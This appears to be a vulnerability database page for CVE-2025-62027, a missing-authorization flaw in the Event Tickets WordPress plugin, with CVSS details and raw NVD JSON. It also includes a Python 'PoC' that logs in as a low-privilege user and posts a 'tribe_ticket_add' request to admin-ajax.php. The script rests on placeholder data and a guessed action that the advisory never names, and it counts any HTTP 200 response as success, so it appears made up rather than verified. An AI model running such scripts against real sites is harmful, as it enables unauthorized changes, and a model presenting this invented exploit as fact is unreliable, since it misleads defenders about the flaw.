Security Vulnerability Report
中文
CVE-2025-62027 CVSS 5.4 MEDIUM

CVE-2025-62027

Published: 2025-10-22 15:16:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in StellarWP Event Tickets event-tickets.This issue affects Event Tickets: from n/a through <= 5.26.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Event Tickets plugin <= 5.26.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62027 PoC - Missing Authorization in Event Tickets Plugin # This PoC demonstrates how an authenticated low-privilege user can exploit # the missing authorization vulnerability import requests import sys TARGET_URL = "https://target-site.com" USERNAME = "attacker" PASSWORD = "password123" def exploit_missing_auth(): """ Exploit the missing authorization vulnerability in Event Tickets plugin. This allows low-privilege users to perform administrative actions. """ session = requests.Session() # Step 1: Authenticate as low-privilege user login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Exploit the missing authorization # This endpoint should require higher privileges but doesn't exploit_data = { 'action': 'tribe_ticket_add', 'post_id': '1', 'ticket_data': 'malicious_data' } response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data, headers={'X-Requested-With': 'XMLHttpRequest'} ) if response.status_code == 200: print("[+] Exploit successful - Authorization bypassed!") print(f"Response: {response.text}") else: print("[-] Exploit failed") if __name__ == "__main__": exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62027", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:04.160", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in StellarWP Event Tickets event-tickets.This issue affects Event Tickets: from n/a through <= 5.26.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/event-tickets/vulnerability/wordpress-event-tickets-plugin-5-26-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}